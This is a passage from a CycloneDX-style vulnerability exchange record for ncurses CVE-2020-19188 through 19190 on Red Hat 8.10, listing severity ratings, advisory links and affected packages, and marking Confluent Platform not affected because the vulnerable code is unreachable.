          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19188",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1116 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19188"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19188"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc4.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19188"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19188"
        }
      ],
      "published": "2023-08-22T19:16:00+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2020-19189",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in postprocess_terminfo function in tinfo/parse_entry.c:997 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19189"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19189"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc5.md"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00033.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19189"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6451-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19189"
        }
      ],
      "published": "2023-08-22T19:16:01+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19190",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
